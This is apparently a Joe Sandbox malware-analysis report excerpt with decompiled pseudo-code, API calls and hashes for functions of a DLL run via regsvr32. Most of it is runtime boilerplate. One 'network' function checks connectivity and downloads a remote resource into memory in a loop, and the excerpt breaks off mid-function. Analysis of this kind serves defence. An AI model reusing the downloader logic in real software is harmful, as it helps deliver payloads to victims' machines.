VirtualFree.KERNELBASE(00000000,0000000C,0000000C,00008000,kernel32.dll,0000000C,0000000C,VirtualFree,0000000C,0000000C,00000000,00008000), ref: 6E9E19A3

Strings

kernel32.dll, xrefs: 6E9E197B
VirtualFree, xrefs: 6E9E196A

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID: VirtualFree$kernel32.dll
API String ID: 1263568516-864021412
Opcode ID: f8c8a8dd56feacb4e4873455bc514924446101d3eaba1d858f1138356d30ea91
Instruction ID: 87701f378865daf962364f3a137623ccf8f592795d7d0e94bd7a46e06e415870
Opcode Fuzzy Hash: f8c8a8dd56feacb4e4873455bc514924446101d3eaba1d858f1138356d30ea91
Instruction Fuzzy Hash: 72F03075A45308FBEB10EFD4D841F9E7BB8AF89704F008649BA04AB380D6309950CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E7010 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E9E7010(void* _a4) {
				void* _v8;
				intOrPtr _v12;

				_v12 = E6E9E22B0(L"KERNEL32.dll", 0);
				_v8 = E6E9E83B0();
				return RtlFreeHeap(_v8, 0, _a4);
			}

0x6e9e7022
0x6e9e702a
0x6e9e703d

APIs

RtlFreeHeap.NTDLL(6E9FCC64,00000000,00000000,KERNEL32.dll,00000000,00000000,6E9FCC64), ref: 6E9E7037

Strings

KERNEL32.dll, xrefs: 6E9E7018

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: KERNEL32.dll
API String ID: 3298025750-254546324
Opcode ID: 1322675d4af1af47172684d5962eec4d576eaaf5df0fe62b05f0f6f6a0024b08
Instruction ID: 56a2eee3f98a49a9e6da27225f3e52e44f66830a4e88cd2d5ad5be182eb1822a
Opcode Fuzzy Hash: 1322675d4af1af47172684d5962eec4d576eaaf5df0fe62b05f0f6f6a0024b08
Instruction Fuzzy Hash: 7CD017B5D4020CFBCB24EBF49805B9EBB7C9F54201F1045A5BF00AB380DAB1AE108BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E6000 Relevance: 3.1, APIs: 2, Instructions: 128
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E6E9E6000(intOrPtr _a4) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void _v1092;
				intOrPtr _t67;
				void* _t103;

				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v32 = E6E9E2400(0, 0);
				_v36 = _v32(_a4, 1, 0);
				if(_v36 != 0) {
					_v40 = E6E9E2610(0, 0);
					_v16 = _v40(0, 0, 0, 0, 0);
					__eflags = _v16;
					if(_v16 != 0) {
						_v44 = E6E9E26A0(0, 0);
						_v20 = _v44(_v16, _a4, 0, 0, 0x84000000, 0);
						__eflags = _v20;
						if(_v20 != 0) {
							do {
								_v52 = E6E9E24F0(0, 0);
								InternetReadFile(_v20,  &_v1092, 0x400,  &_v12);
								_push(_v8 + _v12); // executed
								_t67 = E6E9E8E3F( &_v1092, __eflags); // executed
								_v56 = _t67;
								_v28 = _v56;
								E6E9E7040(_v28, _v24, _v8);
								E6E9E7040(_v28 + _v8,  &_v1092, _v12);
								_v60 = _v24;
								L6E9E8E48(_v60); // executed
								_t103 = _t103 + 8;
								_v24 = _v28;
								_v8 = _v8 + _v12;
								__eflags = _v12;
							} while (_v12 != 0);
							_v64 = E6E9E23A0(0, 0);
							_v64(_v20);
							_v68 = E6E9E23A0(0, 0);
							_v68(_v16);
							return _v24;
						}
						_v48 = E6E9E23A0(0, 0);
						_v48(_v16);
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x6e9e6009
0x6e9e6010
0x6e9e6017
0x6e9e601e
0x6e9e6025
0x6e9e6035
0x6e9e6043
0x6e9e604a
0x6e9e605c
0x6e9e606c
0x6e9e606f
0x6e9e6073
0x6e9e6085
0x6e9e609e
0x6e9e60a1
0x6e9e60a5
0x6e9e60c1
0x6e9e60ca
0x6e9e60e1
0x6e9e60ea
0x6e9e60eb
0x6e9e60f3
0x6e9e60f9
0x6e9e6108
0x6e9e611f
0x6e9e6127
0x6e9e612e
0x6e9e6133
0x6e9e6139
0x6e9e6142
0x6e9e6145
0x6e9e6145
0x6e9e6158
0x6e9e615f
0x6e9e616b
0x6e9e6172
0x00000000
0x6e9e6175
0x6e9e60b0
0x6e9e60b7
0x00000000
0x6e9e60ba
0x00000000
0x6e9e6075
0x00000000

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 6E9E6040

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: CheckConnectionInternet
String ID:
API String ID: 3847983778-0
Opcode ID: e552788e169462a2bed579345369851c18ea6c3a5a0a8f9b2f57dfc164da6c38
Instruction ID: d9960a1d63d374621fa3d4dd0a42bc8e977d8145208e16b03b4c5e767c2e3dd0
Opcode Fuzzy Hash: e552788e169462a2bed579345369851c18ea6c3a5a0a8f9b2f57dfc164da6c38
Instruction Fuzzy Hash: 2841F5B1E50209EFDB11DFE4C845BEEBBB4AF48705F104558E605BB280D7B4AA40CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EF71E Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E6E9EF71E(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t37;
				void* _t38;
				signed int _t46;
				char _t49;
				char _t56;
				signed int _t62;
				void* _t73;
				void* _t79;
				signed int _t84;

				_t77 = __edx;
				_push(_a16);
				_push(_a12);
				E6E9EF832(__ebx, __edx, __edi, __esi, __eflags);
				_t37 = E6E9EF4C8(__eflags, _a4);
				_v16 = _t37;
				if(_t37 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t38 = E6E9EE649(0x220); // executed
					_t79 = _t38;
					_t62 = __ebx | 0xffffffff;
					__eflags = _t79;
					if(__eflags == 0) {
						L5:
						_t84 = _t62;
					} else {
						_t79 = memcpy(_t79,  *(_a12 + 0x48), 0x88 << 2);
						 *_t79 =  *_t79 & 0x00000000;
						_t84 = E6E9EF92D(_t77, __eflags, _v16, _t79);
						__eflags = _t84 - _t62;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E6E9EE8E2();
							}
							asm("lock xadd [eax], ebx");
							_t64 = _t62 == 1;
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								_t56 = _a12;
								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0x6e9fc1e0;
								if( *((intOrPtr*)(_t56 + 0x48)) != 0x6e9fc1e0) {
									E6E9EDC0E( *((intOrPtr*)(_t56 + 0x48)));
								}
							}
							 *_t79 = 1;
							_t73 = _t79;
							_t79 = 0;
							 *(_a12 + 0x48) = _t73;
							_t46 =  *0x6e9fc700; // 0xfffffffe
							__eflags =  *(_a12 + 0x350) & _t46;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t49 = 5;
								_v16 = _t49;
								_v12 = _t49;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E6E9EF3BA(_t64, 0, _t84, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x6e9fc1d4 =  *_a16;
								}
							}
						} else {
							 *((intOrPtr*)(E6E9ED46D(__eflags))) = 0x16;
							goto L5;
						}
					}
					E6E9EDC0E(_t79);
					return _t84;
				} else {
					return 0;
				}
			}

0x6e9ef71e
0x6e9ef726
0x6e9ef729
0x6e9ef72c
0x6e9ef734
0x6e9ef73f
0x6e9ef748
0x6e9ef74e
0x6e9ef74f
0x6e9ef750
0x6e9ef756
0x6e9ef75b
0x6e9ef75d
0x6e9ef761
0x6e9ef763
0x6e9ef793
0x6e9ef793
0x6e9ef765
0x6e9ef772
0x6e9ef778
0x6e9ef780
0x6e9ef784
0x6e9ef786
0x6e9ef7a3
0x6e9ef7a7
0x6e9ef7a9
0x6e9ef7a9
0x6e9ef7b4
0x6e9ef7b8
0x6e9ef7b8
0x6e9ef7b9
0x6e9ef7bb
0x6e9ef7be
0x6e9ef7c5
0x6e9ef7ca
0x6e9ef7cf
0x6e9ef7c5
0x6e9ef7d0
0x6e9ef7d6
0x6e9ef7db
0x6e9ef7dd
0x6e9ef7e3
0x6e9ef7e8
0x6e9ef7ee
0x6e9ef7f3
0x6e9ef7fe
0x6e9ef801
0x6e9ef802
0x6e9ef805
0x6e9ef80b
0x6e9ef80f
0x6e9ef813
0x6e9ef814
0x6e9ef819
0x6e9ef81d
0x6e9ef828
0x6e9ef828
0x6e9ef81d
0x6e9ef788
0x6e9ef78d
0x00000000
0x6e9ef78d
0x6e9ef786
0x6e9ef796
0x6e9ef7a2
0x6e9ef74a
0x6e9ef74d
0x6e9ef74d

APIs

Part of subcall function 6E9EF4C8: GetOEMCP.KERNEL32(00000000,6E9EF739,6E9F097D,00000000,00000000,00000000,00000000,?,6E9F097D), ref: 6E9EF4F3

_free.LIBCMT ref: 6E9EF796

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7d348f8776dd5c16c9b2be012ee0c71a30360a98823c1f622f93b6c74d306caf
Instruction ID: e7c0aa846d50081b4bd9f964ff5e0cd822da2ace39adb67adfe26636b40b97aa
Opcode Fuzzy Hash: 7d348f8776dd5c16c9b2be012ee0c71a30360a98823c1f622f93b6c74d306caf
Instruction Fuzzy Hash: E031A671904209AFDB02DFA8E840ACE77F9FF84318F21446AEA159B650EB32DD10CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E92F6 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E9E92F6(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6E9E9960(__ebx, __edi, __esi);
				_t43 = E6E9E8F8C(__ecx, __edx, 0); // executed
				_t90 = 0x6e9fa5d0;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6E9E8E91();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6e9fcfc8;
					if( *0x6e9fcfc8 != 0) {
						E6E9E9839(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6e9fa5f0);
						E6E9E9960(1, __edi, __esi);
						_t48 =  *0x6e9fcfec; // 0x0
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6e9fcfec = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6E9E8E91();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6e9fcfc8 - 2;
							if( *0x6e9fcfc8 != 2) {
								E6E9E9839(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6e9fa618);
								E6E9E9960(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6E9E95B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6E9E92A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_push(_t110);
											_push( *((intOrPtr*)(_t123 + 8)));
											_t56 = E6E9E9A40();
											_t115 = _t56;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_push(_t56);
													_push( *((intOrPtr*)(_t123 + 8)));
													_t59 = E6E9E9A40();
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6E9E95B8( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6E9E92A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6E9E95B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6e9fcfec - _t110; // 0x0
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6E9E8F5C(1, _t90, 1, _t113);
								E6E9E9A52();
								E6E9E9AB3();
								 *0x6e9fcfc8 =  *0x6e9fcfc8 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6E9E9492();
								_t67 = E6E9E90FE( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6E9E949F();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6e9fcfc8 = 1;
						if(E6E9E8EEE(_t132) != 0) {
							E6E9E9A46(E6E9E9A87());
							E6E9E9A64();
							_t80 = E6E9ED38A(0x6e9f51fc, 0x6e9f520c);
							_pop(_t102);
							if(_t80 == 0 && E6E9E8EC3(1, _t102) != 0) {
								E6E9ED345(_t102, 0x6e9f51bc, 0x6e9f51f8);
								 *0x6e9fcfc8 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6E9E93D9();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6E9E9A81();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6E9E904D(_t85, _t106, _t121, _t138) != 0) {
									 *0x6e9f51b8( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6e9fcfec =  *0x6e9fcfec + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

0x6e9e92f6
0x6e9e92f6
0x6e9e92f6
0x6e9e92f6
0x6e9e92fd
0x6e9e9304
0x6e9e9309
0x6e9e930c
0x6e9e93e3
0x6e9e93e3
0x6e9e93e3
0x00000000
0x6e9e9312
0x6e9e9317
0x6e9e931a
0x6e9e931c
0x6e9e931f
0x6e9e9323
0x6e9e932a
0x6e9e93f7
0x6e9e93fc
0x6e9e93fd
0x6e9e93ff
0x6e9e9404
0x6e9e9409
0x6e9e940e
0x6e9e9410
0x6e9e9417
0x6e9e941f
0x6e9e9422
0x6e9e942b
0x6e9e942e
0x6e9e9431
0x6e9e9438
0x6e9e94a7
0x6e9e94ac
0x6e9e94ad
0x6e9e94af
0x6e9e94b4
0x6e9e94b9
0x6e9e94bc
0x6e9e94be
0x6e9e94cf
0x6e9e94cf
0x6e9e94d3
0x6e9e94d6
0x6e9e94e2
0x6e9e94e2
0x6e9e94ef
0x6e9e94f1
0x6e9e94f4
0x6e9e94f6
0x6e9e9501
0x6e9e9506
0x6e9e9508
0x6e9e950b
0x6e9e950d
0x00000000
0x00000000
0x6e9e950d
0x6e9e94d8
0x6e9e94d8
0x6e9e94db
0x00000000
0x6e9e94dd
0x6e9e94dd
0x6e9e9513
0x6e9e9513
0x6e9e9514
0x6e9e9515
0x6e9e9518
0x6e9e951d
0x6e9e951f
0x6e9e9522
0x6e9e9525
0x6e9e9527
0x6e9e9529
0x6e9e952b
0x6e9e952c
0x6e9e952d
0x6e9e9530
0x6e9e9535
0x6e9e9537
0x6e9e9537
0x6e9e953d
0x6e9e953e
0x6e9e9543
0x6e9e9549
0x6e9e9549
0x6e9e9529
0x6e9e954e
0x6e9e9550
0x6e9e9557
0x6e9e9561
0x6e9e9563
0x6e9e9566
0x6e9e9568
0x6e9e9574
0x6e9e959c
0x6e9e959c
0x6e9e9552
0x6e9e9552
0x6e9e9555
0x00000000
0x00000000
0x6e9e9555
0x6e9e9550
0x6e9e94db
0x6e9e959f
0x6e9e95a6
0x6e9e94c0
0x6e9e94c0
0x6e9e94c6
0x00000000
0x6e9e94c8
0x6e9e94c8
0x6e9e94c8
0x6e9e94c6
0x6e9e95ab
0x6e9e95b7
0x6e9e943a
0x6e9e943a
0x6e9e943f
0x6e9e9444
0x6e9e9449
0x6e9e9450
0x6e9e9454
0x6e9e945e
0x6e9e946a
0x6e9e946c
0x6e9e946c
0x6e9e946e
0x6e9e9471
0x6e9e9478
0x6e9e947d
0x00000000
0x6e9e947d
0x6e9e9412
0x6e9e9412
0x6e9e947f
0x6e9e9482
0x6e9e948e
0x6e9e948e
0x6e9e9330
0x6e9e9330
0x6e9e9341
0x6e9e9348
0x6e9e934d
0x6e9e935c
0x6e9e9362
0x6e9e9365
0x6e9e937a
0x6e9e9381
0x6e9e938b
0x6e9e938d
0x6e9e938d
0x6e9e9365
0x6e9e9390
0x6e9e9397
0x6e9e939e
0x00000000
0x6e9e93a0
0x6e9e93a5
0x6e9e93a7
0x6e9e93aa
0x6e9e93ac
0x6e9e93b5
0x6e9e93c3
0x6e9e93c9
0x6e9e93c9
0x6e9e93b5
0x6e9e93cb
0x6e9e93d3
0x6e9e93d3
0x6e9e93e5
0x6e9e93e8
0x6e9e93f4
0x6e9e93f4
0x6e9e932a

APIs

__RTC_Initialize.LIBCMT ref: 6E9E9343

Part of subcall function 6E9E9A46: InitializeSListHead.KERNEL32(6E9FD000,6E9E934D,6E9FA5D0,00000010,6E9E92DE,?,?,?,6E9E9506,?,00000001,?,?,00000001,?,6E9FA618), ref: 6E9E9A4B

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E9E93AD

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: be01c6001a90c430601058da48e894e1ed9c6bde63d394e67dce23cafec00db2
Instruction ID: 1f9e2ce47f36c12276604c886fedb7f981b2522d77d978232cdf8bed53d5285e
Opcode Fuzzy Hash: be01c6001a90c430601058da48e894e1ed9c6bde63d394e67dce23cafec00db2
Instruction Fuzzy Hash: 79210232608302EEDB56ABF894107DC73A99FA232DF105889CB416BAC1CB32D585CE65

Uniqueness

Uniqueness Score: -1.00%

Function 6E9ECC7D Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9ECC7D(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x6e9ecc82

APIs

Part of subcall function 6E9EFD93: GetEnvironmentStringsW.KERNEL32 ref: 6E9EFD9C
Part of subcall function 6E9EFD93: _free.LIBCMT ref: 6E9EFDFB
Part of subcall function 6E9EFD93: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E9EFE0A

_free.LIBCMT ref: 6E9ECCBD
_free.LIBCMT ref: 6E9ECCC4

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 537832dc6da1922539afd246919468175b255e4c31c533adb7db7f04889f717c
Instruction ID: d65021eba81d12dfc8e10144ea42a22640ac40216212b58cf53f6e1c54aeeeff
Opcode Fuzzy Hash: 537832dc6da1922539afd246919468175b255e4c31c533adb7db7f04889f717c
Instruction Fuzzy Hash: 59E0A02398994049A22316FA794279D1B4D4FD233DB290E16D6508EAC4DBA0C4020D92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E8E01 Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6E9E8E01(signed int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t54;
				signed int _t55;
				signed int _t59;
				intOrPtr _t72;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t85;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr* _t92;
				signed int _t93;
				intOrPtr* _t97;
				signed int _t103;
				signed int _t109;
				intOrPtr* _t112;
				signed int _t115;
				signed int _t118;
				signed int _t123;
				void* _t125;
				void* _t126;
				void* _t128;

				_t109 = __edx;
				while(1) {
					_push(_a4);
					_t54 = E6E9EC544(); // executed
					if(_t54 != 0) {
						return _t54;
					}
					_t55 = E6E9EC4BB(__eflags, _a4);
					__eflags = _t55;
					if(_t55 == 0) {
						__eflags = _a4 - 0xffffffff;
						if(_a4 != 0xffffffff) {
							_push(_t125);
							_t125 = _t128;
							_t128 = _t128 - 0xc;
							E6E9E9606( &_v20);
							E6E9EA50C( &_v20, 0x6e9fa634);
							asm("int3");
						}
						_push(_t125);
						_t126 = _t128;
						E6E9E3110( &_v20);
						E6E9EA50C( &_v20, 0x6e9fa538);
						asm("int3");
						_push(_t126);
						 *0x6e9fcff0 =  *0x6e9fcff0 & 0x00000000;
						 *0x6e9fc010 =  *0x6e9fc010 | 0x00000001;
						_t59 = IsProcessorFeaturePresent(0xa);
						__eflags = _t59;
						if(_t59 != 0) {
							_v28 = _v28 & 0x00000000;
							_push(_t89);
							_t112 =  &_v48;
							asm("cpuid");
							_t90 = _t89;
							 *_t112 = 0;
							 *((intOrPtr*)(_t112 + 4)) = _t89;
							 *((intOrPtr*)(_t112 + 8)) = 0;
							 *(_t112 + 0xc) = _t109;
							_v24 = _v48;
							_v20 = _v36 ^ 0x49656e69;
							_v16 = _v44 ^ 0x756e6547;
							_push(_t90);
							asm("cpuid");
							_t92 =  &_v48;
							 *_t92 = 1;
							 *((intOrPtr*)(_t92 + 4)) = _t90;
							__eflags = _v16 | _v40 ^ 0x6c65746e | _v20;
							 *((intOrPtr*)(_t92 + 8)) = 0;
							 *(_t92 + 0xc) = _t109;
							if((_v16 | _v40 ^ 0x6c65746e | _v20) != 0) {
								L17:
								_t115 =  *0x6e9fcff4; // 0x2
							} else {
								_t85 = _v48 & 0x0fff3ff0;
								__eflags = _t85 - 0x106c0;
								if(_t85 == 0x106c0) {
									L16:
									_t118 =  *0x6e9fcff4; // 0x2
									_t115 = _t118 | 0x00000001;
									 *0x6e9fcff4 = _t115;
								} else {
									__eflags = _t85 - 0x20660;
									if(_t85 == 0x20660) {
										goto L16;
									} else {
										__eflags = _t85 - 0x20670;
										if(_t85 == 0x20670) {
											goto L16;
										} else {
											__eflags = _t85 - 0x30650;
											if(_t85 == 0x30650) {
												goto L16;
											} else {
												__eflags = _t85 - 0x30660;
												if(_t85 == 0x30660) {
													goto L16;
												} else {
													__eflags = _t85 - 0x30670;
													if(_t85 != 0x30670) {
														goto L17;
													} else {
														goto L16;
													}
												}
											}
										}
									}
								}
							}
							_t103 = _v40;
							_t72 = 7;
							_v16 = _t103;
							__eflags = _v24 - _t72;
							if(_v24 < _t72) {
								_t93 = _v28;
							} else {
								_push(_t92);
								asm("cpuid");
								_t97 =  &_v48;
								 *_t97 = _t72;
								 *((intOrPtr*)(_t97 + 4)) = _t92;
								 *((intOrPtr*)(_t97 + 8)) = 0;
								_t103 = _v16;
								 *(_t97 + 0xc) = _t109;
								_t93 = _v44;
								__eflags = _t93 & 0x00000200;
								if((_t93 & 0x00000200) != 0) {
									 *0x6e9fcff4 = _t115 | 0x00000002;
								}
							}
							_t73 =  *0x6e9fc010; // 0x6f
							_t74 = _t73 | 0x00000002;
							 *0x6e9fcff0 = 1;
							 *0x6e9fc010 = _t74;
							__eflags = _t103 & 0x00100000;
							if((_t103 & 0x00100000) != 0) {
								_t75 = _t74 | 0x00000004;
								 *0x6e9fcff0 = 2;
								 *0x6e9fc010 = _t75;
